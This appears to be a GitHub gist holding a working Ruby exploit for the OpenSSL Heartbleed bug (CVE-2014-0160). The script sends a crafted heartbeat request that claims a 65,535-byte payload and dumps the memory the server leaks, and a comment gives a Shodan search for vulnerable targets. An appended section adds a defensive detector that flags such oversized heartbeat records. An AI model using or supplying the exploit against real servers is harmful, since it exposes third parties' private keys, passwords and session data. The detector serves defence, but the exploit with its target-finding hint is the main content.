@komodoooo
Last active February 16, 2024 10:11
CVE-2014-0160 "Heartbleed" exploit
require 'socket'
puts """
CVE-2014-0160
OpenSSL 'Heartbleed' buffer over-read exploit
By Komodo\n
"""
=begin
Shodan dork to search vulnerable targets:
"OpenSSL/1.0.1", "OpenSSL/1.0.1a" through "OpenSSL/1.0.1f"
=end
def main(address)
  # TLS 1.1 ClientHello; the 28 bytes after the 4-byte timestamp are arbitrary client-random filler
  hello = "\x16\x03\x02\x004\x01\x00\x000\x03\x02a]\x9a\xcbCONSTRUCTED-CLIENT-RANDOM-28"+
          "\x00\x00\x02\x00/\x01\x00\x00\x05\xff\x01\x00\x01\x00"
  # Heartbeat request in a 3-byte record that declares a 0xffff-byte payload it does not carry
  payload = "\x18\x03\x02\x00\x03\x01\xff\xff"
  print "Port (press enter for default 443): "
  port = gets.chomp
  s = TCPSocket.new(address,port.empty??443:port.to_i)
  s.sendmsg(hello)
  s.recv(8192)
  s.sendmsg(payload)
  return "\n#{address} Memory dump:\n\n#{s.recv(65536)}\n"
end
begin
  print "Address/domain: "
  puts(main(gets.chomp))
rescue => e
  abort("\nError: #{e}\n\n")
end
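
The script above sends its heartbeat request in the clear, right after the ClientHello, so the record can be inspected on the wire. As an added example (not part of the gist or of OpenSSL), the check below walks plaintext TLS records and flags heartbeat requests whose declared payload length cannot fit in the record; the helper name `oversized_heartbeats` and the sample records are constructed for illustration, and the last sample record has the same 8 bytes as the gist's `payload`.

```ruby
# Added example (not part of the gist): find heartbeat requests whose declared
# payload_length cannot fit inside the TLS record that carries them.
HEARTBEAT   = 24   # TLS ContentType "heartbeat" (RFC 6520)
HB_REQUEST  = 1    # HeartbeatMessageType "heartbeat_request"
MIN_PADDING = 16   # RFC 6520 requires at least 16 bytes of padding

# Walks a buffer of plaintext TLS records and returns one hash per bad request.
# Hypothetical helper name; records sent after encryption starts are opaque here.
def oversized_heartbeats(stream)
  data = stream.b
  findings = []
  offset = 0
  while offset + 5 <= data.bytesize
    type, _major, _minor, rec_len = data.byteslice(offset, 5).unpack("CCCn")
    body = data.byteslice(offset + 5, rec_len)
    break if body.bytesize < rec_len            # truncated capture
    if type == HEARTBEAT
      hb_type, claimed = body.unpack("Cn")      # claimed is nil if body < 3 bytes
      # Same bound as OpenSSL's fix: type + length + payload + padding
      if hb_type == HB_REQUEST && (claimed.nil? || 1 + 2 + claimed + MIN_PADDING > rec_len)
        findings << { offset: offset, record_len: rec_len, claimed: claimed }
      end
    end
    offset += 5 + rec_len
  end
  findings
end

# Constructed sample traffic: a stub handshake record, a well-formed heartbeat
# ("ping" + 16 padding bytes), then the 8-byte request the gist sends.
STUB_HELLO = [22, 3, 2, 4].pack("CCCn") + "\x01\x00\x00\x00".b
GOOD_HB    = [24, 3, 2, 23, 1, 4].pack("CCCnCn") + "ping" + "\x00" * 16
PROBE_HB   = [24, 3, 2, 3, 1, 0xffff].pack("CCCnCn")
SAMPLE     = STUB_HELLO + GOOD_HB + PROBE_HB

if __FILE__ == $0
  oversized_heartbeats(SAMPLE).each do |f|
    puts "offset #{f[:offset]}: heartbeat claims #{f[:claimed].inspect} bytes in a #{f[:record_len]}-byte record"
  end
end
```

A patched server silently discards such a request, so a request like this followed by a large heartbeat response from the server is the signal worth alerting on.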